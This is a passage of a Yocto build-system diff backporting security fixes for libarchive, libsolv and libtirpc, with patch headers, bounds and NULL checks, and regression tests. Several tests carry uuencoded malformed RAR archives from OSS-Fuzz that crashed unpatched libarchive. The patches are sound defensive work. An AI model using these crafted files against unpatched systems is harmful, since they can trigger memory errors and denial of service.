+ length += add;
+@@ -2933,7 +2945,7 @@ static int do_uncompress_block(struct ar
+ continue;
+ } else if(num >= 262) {
+ uint16_t dist_slot;
+- int len = decode_code_length(rar, p, num - 262),
++ int len = decode_code_length(a, rar, p, num - 262),
+ dbits,
+ dist = 1;
+
+@@ -2975,12 +2987,12 @@ static int do_uncompress_block(struct ar
+ uint16_t low_dist;
+
+ if(dbits > 4) {
+- if(ARCHIVE_OK != read_bits_32(
+- rar, p, &add)) {
++ if(ARCHIVE_OK != (ret = read_bits_32(
++ a, rar, p, &add))) {
+ /* Return EOF if we
+ * can't read more
+ * data. */
+- return ARCHIVE_EOF;
++ return ret;
+ }
+
+ skip_bits(rar, dbits - 4);
+@@ -3015,11 +3027,11 @@ static int do_uncompress_block(struct ar
+ /* dbits is one of [0,1,2,3] */
+ int add;
+
+- if(ARCHIVE_OK != read_consume_bits(rar,
+- p, dbits, &add)) {
++ if(ARCHIVE_OK != (ret = read_consume_bits(a, rar,
++ p, dbits, &add))) {
+ /* Return EOF if we can't read
+ * more data. */
+- return ARCHIVE_EOF;
++ return ret;
+ }
+
+ dist += add;
+@@ -3076,7 +3088,11 @@ static int do_uncompress_block(struct ar
+ return ARCHIVE_FATAL;
+ }
+
+- len = decode_code_length(rar, p, len_slot);
++ len = decode_code_length(a, rar, p, len_slot);
++ if (len == -1) {
++ return ARCHIVE_FATAL;
++ }
++
+ rar->cstate.last_len = len;
+
+ if(ARCHIVE_OK != copy_string(a, len, dist))
+--- a/libarchive/test/test_read_format_rar5.c
++++ b/libarchive/test/test_read_format_rar5.c
+@@ -1271,3 +1271,20 @@ DEFINE_TEST(test_read_format_rar5_block_
+
+ EPILOGUE();
+ }
++
++DEFINE_TEST(test_read_format_rar5_decode_number_out_of_bounds_read)
++{
++ /* oss fuzz 30448 */
++
++ char buf[4096];
++ PROLOGUE("test_read_format_rar5_decode_number_out_of_bounds_read.rar");
++
++ /* Return codes of those calls are ignored, because this sample file
++ * is invalid. However, the unpacker shouldn't produce any SIGSEGV
++ * errors during processing. */
++
++ (void) archive_read_next_header(a, &ae);
++ while(0 < archive_read_data(a, buf, sizeof(buf))) {}
++
++ EPILOGUE();
++}
+--- /dev/null
++++ b/libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu
+@@ -0,0 +1,10 @@
++begin 644 test_read_format_rar5_decode_number_out_of_bounds_read.rar
++M4F%R(1H'`0!3@"KT`P+G(@(0("`@@`L!!"`@("`@(($D_[BJ2"!::7!)210V
++M+0#ZF#)Q!`+>YPW_("`@("``_R````````````````````````````!__P``
++M``````!T72`@/EW_(/\@("`@("`@("`@("`@("`@("`@("`@("`@(/\@("`@
++M("`@("#_("`@("`@("`@("`@("`@("`@("`@("`@("#_("`@("`@("`@_R`@
++M("`@("`@("`@("`@("`@("`@("`@("`@_R`@("`@("`@(/\@("`@("`@("`@
++M("`@("`@("`@("`@("`@(/\@("`@("`@("#_("`@("`@("`@("`@("`@("`@
++E("`@("`@("#_("`@("`@("`@_R`@("`@("`@("`@("`@("`@(```
++`
++end
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch
new file mode 100644
index 0000000000..b5da44ec7b
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch
@@ -0,0 +1,121 @@
+From 17f4e83c0f0fc3bacf4b2bbacb01f987bb5aff5f Mon Sep 17 00:00:00 2001
+From: Grzegorz Antoniak <ga@anadoxin.org>
+Date: Fri, 12 Feb 2021 20:18:31 +0100
+Subject: [PATCH] RAR5 reader: fix invalid memory access in some files
+
+RAR5 reader uses several variables to manage the window buffer during
+extraction: the buffer itself (`window_buf`), the current size of the
+window buffer (`window_size`), and a helper variable (`window_mask`)
+that is used to constrain read and write offsets to the window buffer.
+
+Some specially crafted files can force the unpacker to update the
+`window_mask` variable to a value that is out of sync with current
+buffer size. If the `window_mask` will be bigger than the actual buffer
+size, then an invalid access operation can happen (SIGSEGV).
+
+This commit ensures that if the `window_size` and `window_mask` will be
+changed, the window buffer will be reallocated to the proper size, so no
+invalid memory operation should be possible.
+
+This commit contains a test file from OSSFuzz #30442.
+
+Upstream-Status: Backport [https://git.launchpad.net/ubuntu/+source/libarchive/plain/debian/patches/CVE-2021-36976-2.patch?h=applied/3.4.3-2ubuntu0.1]
+CVE: CVE-2021-36976
+Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
+
+---
+ Makefile.am | 1 +
+ libarchive/archive_read_support_format_rar5.c | 27 ++++++++++++++-----
+ libarchive/test/test_read_format_rar5.c | 17 ++++++++++++
+ ...mat_rar5_window_buf_and_size_desync.rar.uu | 11 ++++++++
+ 4 files changed, 50 insertions(+), 6 deletions(-)
+ create mode 100644 libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu
+
+--- a/Makefile.am
++++ b/Makefile.am
+@@ -884,6 +884,7 @@ libarchive_test_EXTRA_DIST=\
+ libarchive/test/test_read_format_rar5_different_winsize_on_merge.rar.uu \
+ libarchive/test/test_read_format_rar5_block_size_is_too_small.rar.uu \
+ libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu \
++ libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu \
+ libarchive/test/test_read_format_raw.bufr.uu \
+ libarchive/test/test_read_format_raw.data.gz.uu \
+ libarchive/test/test_read_format_raw.data.Z.uu \
+--- a/libarchive/archive_read_support_format_rar5.c
++++ b/libarchive/archive_read_support_format_rar5.c
+@@ -1730,14 +1730,29 @@ static int process_head_file(struct arch
+ }
+ }
+
+- /* If we're currently switching volumes, ignore the new definition of
+- * window_size. */
+- if(rar->cstate.switch_multivolume == 0) {
+- /* Values up to 64M should fit into ssize_t on every
+- * architecture. */
+- rar->cstate.window_size = (ssize_t) window_size;
++ if(rar->cstate.window_size < (ssize_t) window_size &&
++ rar->cstate.window_buf)
++ {
++ /* If window_buf has been allocated before, reallocate it, so
++ * that its size will match new window_size. */
++
++ uint8_t* new_window_buf =
++ realloc(rar->cstate.window_buf, window_size);
++
++ if(!new_window_buf) {
++ archive_set_error(&a->archive, ARCHIVE_ERRNO_PROGRAMMER,
++ "Not enough memory when trying to realloc the window "
++ "buffer.");
++ return ARCHIVE_FATAL;
++ }
++
++ rar->cstate.window_buf = new_window_buf;
+ }
+
++ /* Values up to 64M should fit into ssize_t on every
++ * architecture. */
++ rar->cstate.window_size = (ssize_t) window_size;
++
+ if(rar->file.solid > 0 && rar->file.solid_window_size == 0) {
+ /* Solid files have to have the same window_size across
+ whole archive. Remember the window_size parameter
+--- a/libarchive/test/test_read_format_rar5.c
++++ b/libarchive/test/test_read_format_rar5.c
+@@ -1206,6 +1206,23 @@ DEFINE_TEST(test_read_format_rar5_differ
+ EPILOGUE();
+ }
+
++DEFINE_TEST(test_read_format_rar5_window_buf_and_size_desync)
++{
++ /* oss fuzz 30442 */
++
++ char buf[4096];
++ PROLOGUE("test_read_format_rar5_window_buf_and_size_desync.rar");
++
++ /* Return codes of those calls are ignored, because this sample file
++ * is invalid. However, the unpacker shouldn't produce any SIGSEGV
++ * errors during processing. */
++
++ (void) archive_read_next_header(a, &ae);
++ while(0 < archive_read_data(a, buf, 46)) {}
++
++ EPILOGUE();
++}
++
+ DEFINE_TEST(test_read_format_rar5_arm_filter_on_window_boundary)
+ {
+ char buf[4096];
+--- /dev/null
++++ b/libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu
+@@ -0,0 +1,11 @@
++begin 644 test_read_format_rar5_window_buf_and_size_desync.rar
++M4F%R(1H'`0`]/-[E`@$`_P$`1#[Z5P("`PL``BXB"?\`!(@B@0`)6.-AF?_1
++M^0DI&0GG(F%R(0<:)`!3@"KT`P+G(@O_X[\``#&``(?!!0$$[:L``$.M*E)A
++M<B$`O<\>P0";/P1%``A*2DI*2DYQ<6TN9'%*2DI*2DI*``!D<F--``````"Z
++MNC*ZNKJZNFYO=&%I;+JZNKJZNKJZOKJZ.KJZNKJZNKKZU@4%````0$!`0$!`
++M0$!`0$!`0$!`0$#_________/T#`0$!`0$!`-UM`0$!`0$!`0$!`0$!`0$!`
++M0$!`0'!,J+:O!IZ-WN4'@`!3*F0`````````````````````````````````
++M``````````````#T`P)287(A&@<!`%.`*O0#`N<B`_,F@`'[__\``(`4`01S
++J'`/H/O\H@?\D`#O9GIZ>GN<B"_]%``(``&1RGIZ>GIZ>8_^>GE/_``!.
++`
++end
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch
new file mode 100644
index 0000000000..0e1549f229
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch
@@ -0,0 +1,93 @@
+From 313bcd7ac547f7cc25945831f63507420c0874d7 Mon Sep 17 00:00:00 2001
+From: Grzegorz Antoniak <ga@anadoxin.org>
+Date: Sat, 13 Feb 2021 10:13:22 +0100
+Subject: [PATCH] RAR5 reader: add more checks for invalid extraction
+ parameters
+
+Some specially crafted files declare invalid extraction parameters that
+can confuse the RAR5 reader.
+
+One of the arguments is the declared window size parameter that the
+archive file can declare for each file stored in the archive. Some
+crafted files declare window size equal to 0, which is clearly wrong.
+
+This commit adds additional safety checks decreasing the tolerance of
+the RAR5 format.
+
+This commit also contains OSSFuzz sample #30459.
+---
+ Makefile.am | 1 +
+ libarchive/archive_read_support_format_rar5.c | 10 ++++++++++
+ libarchive/test/test_read_format_rar5.c | 19 +++++++++++++++++++
+ ...t_rar5_bad_window_sz_in_mltarc_file.rar.uu | 7 +++++++
+ 4 files changed, 37 insertions(+)
+ create mode 100644 libarchive/test/test_read_format_rar5_bad_window_sz_in_mltarc_file.rar.uu
+
+Upstream-Status: Backport [https://github.com/libarchive/libarchive/pull/1493/commits/313bcd7ac547f7cc25945831f63507420c0874d7]
+CVE: CVE-2021-36976
+Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
+
+--- libarchive-3.4.2.orig/Makefile.am
++++ libarchive-3.4.2/Makefile.am
+@@ -882,6 +882,7 @@ libarchive_test_EXTRA_DIST=\
+ libarchive/test/test_read_format_rar5_block_size_is_too_small.rar.uu \
+ libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu \
+ libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu \
++ libarchive/test/test_read_format_rar5_bad_window_sz_in_mltarc_file.rar.uu \
+ libarchive/test/test_read_format_raw.bufr.uu \
+ libarchive/test/test_read_format_raw.data.gz.uu \
+ libarchive/test/test_read_format_raw.data.Z.uu \
+--- libarchive-3.4.2.orig/libarchive/archive_read_support_format_rar5.c
++++ libarchive-3.4.2/libarchive/archive_read_support_format_rar5.c
+@@ -3637,6 +3637,16 @@ static int do_uncompress_file(struct arc
+ rar->cstate.initialized = 1;
+ }
+
++ /* Don't allow extraction if window_size is invalid. */
++ if(rar->cstate.window_size == 0) {
++ archive_set_error(&a->archive,
++ ARCHIVE_ERRNO_FILE_FORMAT,
++ "Invalid window size declaration in this file");
++
++ /* This should never happen in valid files. */
++ return ARCHIVE_FATAL;
++ }
++
+ if(rar->cstate.all_filters_applied == 1) {
+ /* We use while(1) here, but standard case allows for just 1
+ * iteration. The loop will iterate if process_block() didn't
+--- libarchive-3.4.2.orig/libarchive/test/test_read_format_rar5.c
++++ libarchive-3.4.2/libarchive/test/test_read_format_rar5.c
+@@ -1305,3 +1305,22 @@ DEFINE_TEST(test_read_format_rar5_decode
+
+ EPILOGUE();
+ }
++
++DEFINE_TEST(test_read_format_rar5_bad_window_size_in_multiarchive_file)
++{
++ /* oss fuzz 30459 */
++
++ char buf[4096];
++ PROLOGUE("test_read_format_rar5_bad_window_sz_in_mltarc_file.rar");
++
++ /* This file is damaged, so those functions should return failure.
++ * Additionally, SIGSEGV shouldn't be raised during execution
++ * of those functions. */
++
++ (void) archive_read_next_header(a, &ae);
++ while(0 < archive_read_data(a, buf, sizeof(buf))) {}
++ (void) archive_read_next_header(a, &ae);
++ while(0 < archive_read_data(a, buf, sizeof(buf))) {}
++
++ EPILOGUE();
++}
+--- /dev/null
++++ libarchive-3.4.2/libarchive/test/test_read_format_rar5_bad_window_sz_in_mltarc_file.rar.uu
+@@ -0,0 +1,7 @@
++begin 644 test_read_format_rar5_bad_window_size_in_multiarchive_file.rar
++M4F%R(1H'`0`]/-[E`@$`_R`@1#[Z5P("`PL`("`@@"(`"?\@("#___\@("`@
++M("`@("`@("`@4X`J]`,"YR(#$($@("`@``$@("`@@<L0("`@("`@("`@("`@
++M("`@(""LCTJA`P$%`B`@`2!3@"KT`P+G(@,@("`@_P,!!B`@(/___R`@(('+
++5$"`OX2`@[.SL[.S_("`@("`@("`@
++`
++end
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2022-26280.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2022-26280.patch
new file mode 100644
index 0000000000..501fcc5848
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2022-26280.patch
@@ -0,0 +1,29 @@
+From cfaa28168a07ea4a53276b63068f94fce37d6aff Mon Sep 17 00:00:00 2001
+From: Tim Kientzle <kientzle@acm.org>
+Date: Thu, 24 Mar 2022 10:35:00 +0100
+Subject: [PATCH] ZIP reader: fix possible out-of-bounds read in
+ zipx_lzma_alone_init()
+
+Fixes #1672
+
+CVE: CVE-2022-26280
+Upstream-Status: Backport [https://github.com/libarchive/libarchive/commit/cfaa28168a07ea4a53276b63068f94fce37d6aff]
+Signed-off-by: Andrej Valek <andrej.valek@siemens.com>
+
+---
+ libarchive/archive_read_support_format_zip.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/libarchive/archive_read_support_format_zip.c b/libarchive/archive_read_support_format_zip.c
+index 38ada70b5..9d6c900b2 100644
+--- a/libarchive/archive_read_support_format_zip.c
++++ b/libarchive/archive_read_support_format_zip.c
+@@ -1667,7 +1667,7 @@ zipx_lzma_alone_init(struct archive_read *a, struct zip *zip)
+ */
+
+ /* Read magic1,magic2,lzma_params from the ZIPX stream. */
+- if((p = __archive_read_ahead(a, 9, NULL)) == NULL) {
++ if(zip->entry_bytes_remaining < 9 || (p = __archive_read_ahead(a, 9, NULL)) == NULL) {
+ archive_set_error(&a->archive, ARCHIVE_ERRNO_FILE_FORMAT,
+ "Truncated lzma data");
+ return (ARCHIVE_FATAL);
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2022-36227.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2022-36227.patch
new file mode 100644
index 0000000000..980a0e884a
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2022-36227.patch
@@ -0,0 +1,43 @@
+From 6311080bff566fcc5591dadfd78efb41705b717f Mon Sep 17 00:00:00 2001
+From: obiwac <obiwac@gmail.com>
+Date: Fri, 22 Jul 2022 22:41:10 +0200
+Subject: [PATCH] CVE-2022-36227
+
+libarchive: CVE-2022-36227 Handle a `calloc` returning NULL (fixes #1754)
+
+Upstream-Status: Backport [https://github.com/libarchive/libarchive/commit/bff38efe8c110469c5080d387bec62a6ca15b1a5]
+CVE: CVE-2022-36227
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ libarchive/archive_write.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/libarchive/archive_write.c b/libarchive/archive_write.c
+index 98a55fb..7fe88b6 100644
+--- a/libarchive/archive_write.c
++++ b/libarchive/archive_write.c
+@@ -211,6 +211,10 @@ __archive_write_allocate_filter(struct archive *_a)
+ struct archive_write_filter *f;
+
+ f = calloc(1, sizeof(*f));
++
++ if (f == NULL)
++ return (NULL);
++
+ f->archive = _a;
+ f->state = ARCHIVE_WRITE_FILTER_STATE_NEW;
+ if (a->filter_first == NULL)
+@@ -527,6 +531,10 @@ archive_write_open(struct archive *_a, void *client_data,
+ a->client_data = client_data;
+
+ client_filter = __archive_write_allocate_filter(_a);
++
++ if (client_filter == NULL)
++ return (ARCHIVE_FATAL);
++
+ client_filter->open = archive_write_client_open;
+ client_filter->write = archive_write_client_write;
+ client_filter->close = archive_write_client_close;
+--
+2.25.1
+
diff --git a/meta/recipes-extended/libarchive/libarchive_3.4.2.bb b/meta/recipes-extended/libarchive/libarchive_3.4.2.bb
index 0ab40fc096..728eedc401 100644
--- a/meta/recipes-extended/libarchive/libarchive_3.4.2.bb
+++ b/meta/recipes-extended/libarchive/libarchive_3.4.2.bb
@@ -32,11 +32,23 @@ PACKAGECONFIG[mbedtls] = "--with-mbedtls,--without-mbedtls,mbedtls,"
EXTRA_OECONF += "--enable-largefile"
-SRC_URI = "http://libarchive.org/downloads/libarchive-${PV}.tar.gz"
+SRC_URI = "http://libarchive.org/downloads/libarchive-${PV}.tar.gz \
+ file://CVE-2021-36976-1.patch \
+ file://CVE-2021-36976-2.patch \
+ file://CVE-2021-36976-3.patch \
+ file://CVE-2021-23177.patch \
+ file://CVE-2021-31566-01.patch \
+ file://CVE-2021-31566-02.patch \
+ file://CVE-2022-26280.patch \
+ file://CVE-2022-36227.patch \
+"
SRC_URI[md5sum] = "d953ed6b47694dadf0e6042f8f9ff451"
SRC_URI[sha256sum] = "b60d58d12632ecf1e8fad7316dc82c6b9738a35625746b47ecdcaf4aed176176"
+# upstream-wontfix: upstream has documented that the reported function is not thread-safe
+CVE_CHECK_WHITELIST += "CVE-2023-30571"
+
inherit autotools update-alternatives pkgconfig
CPPFLAGS += "-I${WORKDIR}/extra-includes"
diff --git a/meta/recipes-extended/libnsl/libnsl2_git.bb b/meta/recipes-extended/libnsl/libnsl2_git.bb
index 28c84af7ad..cbb38674b9 100644
--- a/meta/recipes-extended/libnsl/libnsl2_git.bb
+++ b/meta/recipes-extended/libnsl/libnsl2_git.bb
@@ -14,7 +14,7 @@ PV = "1.2.0+git${SRCPV}"
SRCREV = "4a062cf4180d99371198951e4ea5b4550efd58a3"
-SRC_URI = "git://github.com/thkukuk/libnsl \
+SRC_URI = "git://github.com/thkukuk/libnsl;branch=master;protocol=https \
"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-extended/libnss-nis/libnss-nis.bb b/meta/recipes-extended/libnss-nis/libnss-nis.bb
index a1d914e871..0ec64544be 100644
--- a/meta/recipes-extended/libnss-nis/libnss-nis.bb
+++ b/meta/recipes-extended/libnss-nis/libnss-nis.bb
@@ -13,11 +13,11 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
SECTION = "libs"
DEPENDS += "libtirpc libnsl2"
-PV = "3.1+git${SRCPV}"
+PV = "3.2"
-SRCREV = "062f31999b35393abf7595cb89dfc9590d5a42ad"
+SRCREV = "cd0d391af9535b56e612ed227c1b89be269f3d59"
-SRC_URI = "git://github.com/thkukuk/libnss_nis \
+SRC_URI = "git://github.com/thkukuk/libnss_nis;branch=master;protocol=https \
"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch b/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch
new file mode 100644
index 0000000000..fa577fd533
--- /dev/null
+++ b/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch
@@ -0,0 +1,82 @@
+From 0077ef29eb46d2e1df2f230fc95a1d9748d49dec Mon Sep 17 00:00:00 2001
+From: Michael Schroeder <mls@suse.de>
+Date: Mon, 14 Dec 2020 11:12:00 +0100
+Subject: [PATCH] testcase_read: error out if repos are added or the system is
+ changed too late
+
+We must not add new solvables after the considered map was created, the solver
+was created, or jobs were added. We may not changed the system after jobs have
+been added.
+
+(Jobs may point inside the whatproviedes array, so we must not invalidate this
+area.)
+
+Upstream-Status: Backport [https://github.com/openSUSE/libsolv/commit/0077ef29eb46d2e1df2f230fc95a1d9748d49dec]
+CVE: CVE-2021-3200
+CVE: CVE-2021-33928
+CVE: CVE-2021-33929
+CVE: CVE-2021-33930
+CVE: CVE-2021-33938
+CVE: CVE-2021-44568
+CVE: CVE-2021-44569
+CVE: CVE-2021-44570
+CVE: CVE-2021-44571
+CVE: CVE-2021-44573
+CVE: CVE-2021-44574
+CVE: CVE-2021-44575
+CVE: CVE-2021-44576
+CVE: CVE-2021-44577
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+---
+ ext/testcase.c | 21 +++++++++++++++++++++
+ 1 file changed, 21 insertions(+)
+
+diff --git a/ext/testcase.c b/ext/testcase.c
+index 0be7a213..8fb6d793 100644
+--- a/ext/testcase.c
++++ b/ext/testcase.c
+@@ -1991,6 +1991,7 @@ testcase_read(Pool *pool, FILE *fp, const char *testcase, Queue *job, char **res
+ Id *genid = 0;
+ int ngenid = 0;
+ Queue autoinstq;
++ int oldjobsize = job ? job->count : 0;
+
+ if (resultp)
+ *resultp = 0;
+@@ -2065,6 +2066,21 @@ testcase_read(Pool *pool, FILE *fp, const char *testcase, Queue *job, char **res
+ int prio, subprio;
+ const char *rdata;
+
++ if (pool->considered)
++ {
++ pool_error(pool, 0, "testcase_read: cannot add repos after packages were disabled");
++ continue;
++ }
++ if (solv)
++ {
++ pool_error(pool, 0, "testcase_read: cannot add repos after the solver was created");
++ continue;
++ }
++ if (job && job->count != oldjobsize)
++ {
++ pool_error(pool, 0, "testcase_read: cannot add repos after jobs have been created");
++ continue;
++ }
+ prepared = 0;
+ if (!poolflagsreset)
+ {
+@@ -2125,6 +2141,11 @@ testcase_read(Pool *pool, FILE *fp, const char *testcase, Queue *job, char **res
+ int i;
+
+ /* must set the disttype before the arch */
++ if (job && job->count != oldjobsize)
++ {
++ pool_error(pool, 0, "testcase_read: cannot change the system after jobs have been created");
++ continue;
++ }
+ prepared = 0;
+ if (strcmp(pieces[2], "*") != 0)
+ {
diff --git a/meta/recipes-extended/libsolv/libsolv_0.7.10.bb b/meta/recipes-extended/libsolv/libsolv_0.7.10.bb
index 265a27c00d..2c2aedc32c 100644
--- a/meta/recipes-extended/libsolv/libsolv_0.7.10.bb
+++ b/meta/recipes-extended/libsolv/libsolv_0.7.10.bb
@@ -1,4 +1,5 @@
SUMMARY = "Library for solving packages and reading repositories"
+DESCRIPTION = "This is libsolv, a free package dependency solver using a satisfiability algorithm for solving packages and reading repositories"
HOMEPAGE = "https://github.com/openSUSE/libsolv"
BUGTRACKER = "https://github.com/openSUSE/libsolv/issues"
SECTION = "devel"
@@ -7,7 +8,8 @@ LIC_FILES_CHKSUM = "file://LICENSE.BSD;md5=62272bd11c97396d4aaf1c41bc11f7d8"
DEPENDS = "expat zlib"
-SRC_URI = "git://github.com/openSUSE/libsolv.git \
+SRC_URI = "git://github.com/openSUSE/libsolv.git;branch=master;protocol=https \
+ file://CVE-2021-3200.patch \
"
SRCREV = "605dd2645ef899e2b7c95709476fb51e28d7e378"
diff --git a/meta/recipes-extended/libtirpc/libtirpc/CVE-2021-46828.patch b/meta/recipes-extended/libtirpc/libtirpc/CVE-2021-46828.patch
new file mode 100644
index 0000000000..c78e7ef4d5
--- /dev/null
+++ b/meta/recipes-extended/libtirpc/libtirpc/CVE-2021-46828.patch
@@ -0,0 +1,155 @@
+From 48309e7cb230fc539c3edab0b3363f8ce973194f Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 28 Jul 2022 09:11:04 +0530
+Subject: [PATCH] CVE-2021-46828
+
+Upstream-Status: Backport [http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed]
+CVE: CVE-2021-46828
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/svc.c | 17 +++++++++++++-
+ src/svc_vc.c | 62 +++++++++++++++++++++++++++++++++++++++++++++++++++-
+ 2 files changed, 77 insertions(+), 2 deletions(-)
+
+diff --git a/src/svc.c b/src/svc.c
+index 6db164b..3a8709f 100644
+--- a/src/svc.c
++++ b/src/svc.c
+@@ -57,7 +57,7 @@
+
+ #define max(a, b) (a > b ? a : b)
+
+-static SVCXPRT **__svc_xports;
++SVCXPRT **__svc_xports;
+ int __svc_maxrec;
+
+ /*
+@@ -194,6 +194,21 @@ __xprt_do_unregister (xprt, dolock)
+ rwlock_unlock (&svc_fd_lock);
+ }
+
++int
++svc_open_fds()
++{
++ int ix;
++ int nfds = 0;
++
++ rwlock_rdlock (&svc_fd_lock);
++ for (ix = 0; ix < svc_max_pollfd; ++ix) {
++ if (svc_pollfd[ix].fd != -1)
++ nfds++;
++ }
++ rwlock_unlock (&svc_fd_lock);
++ return (nfds);
++}
++
+ /*
+ * Add a service program to the callout list.
+ * The dispatch routine will be called when a rpc request for this
+diff --git a/src/svc_vc.c b/src/svc_vc.c
+index c23cd36..1729963 100644
+--- a/src/svc_vc.c
++++ b/src/svc_vc.c
+@@ -64,6 +64,8 @@
+
+
+ extern rwlock_t svc_fd_lock;
++extern SVCXPRT **__svc_xports;
++extern int svc_open_fds();
+
+ static SVCXPRT *makefd_xprt(int, u_int, u_int);
+ static bool_t rendezvous_request(SVCXPRT *, struct rpc_msg *);
+@@ -82,6 +84,7 @@ static void svc_vc_ops(SVCXPRT *);
+ static bool_t svc_vc_control(SVCXPRT *xprt, const u_int rq, void *in);
+ static bool_t svc_vc_rendezvous_control (SVCXPRT *xprt, const u_int rq,
+ void *in);
++static int __svc_destroy_idle(int timeout);
+
+ struct cf_rendezvous { /* kept in xprt->xp_p1 for rendezvouser */
+ u_int sendsize;
+@@ -312,13 +315,14 @@ done:
+ return (xprt);
+ }
+
++
+ /*ARGSUSED*/
+ static bool_t
+ rendezvous_request(xprt, msg)
+ SVCXPRT *xprt;
+ struct rpc_msg *msg;
+ {
+- int sock, flags;
++ int sock, flags, nfds, cnt;
+ struct cf_rendezvous *r;
+ struct cf_conn *cd;
+ struct sockaddr_storage addr;
+@@ -378,6 +382,16 @@ again:
+
+ gettimeofday(&cd->last_recv_time, NULL);
+
++ nfds = svc_open_fds();
++ if (nfds >= (_rpc_dtablesize() / 5) * 4) {
++ /* destroy idle connections */
++ cnt = __svc_destroy_idle(15);
++ if (cnt == 0) {
++ /* destroy least active */
++ __svc_destroy_idle(0);
++ }
++ }
++
+ return (FALSE); /* there is never an rpc msg to be processed */
+ }
+
+@@ -819,3 +833,49 @@ __svc_clean_idle(fd_set *fds, int timeout, bool_t cleanblock)
+ {
+ return FALSE;
+ }
++
++static int
++__svc_destroy_idle(int timeout)
++{
++ int i, ncleaned = 0;
++ SVCXPRT *xprt, *least_active;
++ struct timeval tv, tdiff, tmax;
++ struct cf_conn *cd;
++
++ gettimeofday(&tv, NULL);
++ tmax.tv_sec = tmax.tv_usec = 0;
++ least_active = NULL;
++ rwlock_wrlock(&svc_fd_lock);
++
++ for (i = 0; i <= svc_max_pollfd; i++) {
++ if (svc_pollfd[i].fd == -1)
++ continue;
++ xprt = __svc_xports[i];
++ if (xprt == NULL || xprt->xp_ops == NULL ||
++ xprt->xp_ops->xp_recv != svc_vc_recv)
++ continue;
++ cd = (struct cf_conn *)xprt->xp_p1;
++ if (!cd->nonblock)
++ continue;
++ if (timeout == 0) {
++ timersub(&tv, &cd->last_recv_time, &tdiff);
++ if (timercmp(&tdiff, &tmax, >)) {
++ tmax = tdiff;
++ least_active = xprt;
++ }
++ continue;
++ }
++ if (tv.tv_sec - cd->last_recv_time.tv_sec > timeout) {
++ __xprt_unregister_unlocked(xprt);
++ __svc_vc_dodestroy(xprt);
++ ncleaned++;
++ }
++ }
++ if (timeout == 0 && least_active != NULL) {
++ __xprt_unregister_unlocked(least_active);
++ __svc_vc_dodestroy(least_active);
++ ncleaned++;
++ }
++ rwlock_unlock(&svc_fd_lock);
++ return (ncleaned);
++}
+--
+2.25.1
+
diff --git a/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb b/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb
index 10a324c3b6..80151ff83a 100644
--- a/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb
+++ b/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb
@@ -9,7 +9,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=f835cce8852481e4b2bbbdd23b5e47f3 \
PROVIDES = "virtual/librpc"
-SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BP}.tar.bz2"
+SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BP}.tar.bz2 \
+ file://CVE-2021-46828.patch \
+ "
UPSTREAM_CHECK_URI = "https://sourceforge.net/projects/libtirpc/files/libtirpc/"
UPSTREAM_CHECK_REGEX = "(?P<pver>\d+(\.\d+)+)/"
SRC_URI[md5sum] = "b25f9cc18bfad50f7c446c77f4ae00bb"
@@ -20,7 +22,7 @@ inherit autotools pkgconfig
EXTRA_OECONF = "--disable-gssapi"
do_install_append() {
- chown root:root ${D}${sysconfdir}/netconfig
+ test -e ${D}${sysconfdir}/netconfig && chown root:root ${D}${sysconfdir}/netconfig
}
BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch
index f17bdce2c0..44b9136b05 100644
--- a/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch
+++ b/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch
@@ -1,4 +1,4 @@
